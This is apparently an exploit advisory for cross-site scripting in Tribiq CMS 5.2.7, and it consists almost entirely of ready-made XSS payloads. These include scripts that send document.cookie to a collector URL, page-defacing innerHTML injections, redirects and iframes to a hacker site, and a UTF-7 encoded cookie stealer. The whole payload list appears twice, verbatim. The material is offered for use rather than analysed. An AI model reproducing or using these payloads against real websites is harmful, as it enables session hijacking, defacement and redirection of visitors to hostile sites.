# Exploit Title: Tribq CMS Cross-Site Scripting
# Exploit Author: Kuroi'SH
# Credit goes for: http://spyhackerz.com
# Vendor Homepage: Tribiq CMS | Free software downloads at SourceForge.net
# Tested on: Windows, PHP 5.2.9
# Affected Version : 5.2.7
#########################################
Summary:
============================================
1. Cross-Site Scripting
ex:http://localhost/path/plugins.php?fo...9%3C/script%3E
tested Xss
============================================
Steal Cookies :
<script>alert(12345)</script>
<ScRiPt >prompt(995041)</ScRiPt>
<script>alert("test");</script>
"><script>alert(1)</script>
<script>alert(document.cookie)</script>
" onmouseover=prompt(11111) bad="
<script SRC=http://localhost/xss/cookies.php?'+document.cookie></script>
<script>document.location='http://localhost/xss/cookies.php?'+document.cookie</script>
============================================
Exploit in new page :
<body onload="document.body.innerHTML='<h1>test !!</h1>';">
<script>document.documentElement.innerHTML="<h1>te st !!</h1>";</script>
============================================
Redirect :
<META http-equiv="refresh" content="0;URL="http://spyhackerz.com">
<IFRAME WIDTH=100% HEIGHT=300 SRC="http://spyhackerz.com""></IFRAME>
============================================
UTF-7 :
%2BADw-script%2BAD4-alert(document.cookie)%2BADw-%2Fscript%2BAD4-
# Exploit Author: Kuroi'SH
# Credit goes for: http://spyhackerz.com
# Vendor Homepage: Tribiq CMS | Free software downloads at SourceForge.net
# Tested on: Windows, PHP 5.2.9
# Affected Version : 5.2.7
#########################################
Summary:
============================================
1. Cross-Site Scripting
ex:http://localhost/path/plugins.php?fo...9%3C/script%3E
tested Xss
============================================
Steal Cookies :
<script>alert(12345)</script>
<ScRiPt >prompt(995041)</ScRiPt>
<script>alert("test");</script>
"><script>alert(1)</script>
<script>alert(document.cookie)</script>
" onmouseover=prompt(11111) bad="
<script SRC=http://localhost/xss/cookies.php?'+document.cookie></script>
<script>document.location='http://localhost/xss/cookies.php?'+document.cookie</script>
============================================
Exploit in new page :
<body onload="document.body.innerHTML='<h1>test !!</h1>';">
<script>document.documentElement.innerHTML="<h1>te st !!</h1>";</script>
============================================
Redirect :
<META http-equiv="refresh" content="0;URL="http://spyhackerz.com">
<IFRAME WIDTH=100% HEIGHT=300 SRC="http://spyhackerz.com""></IFRAME>
============================================
UTF-7 :
%2BADw-script%2BAD4-alert(document.cookie)%2BADw-%2Fscript%2BAD4-
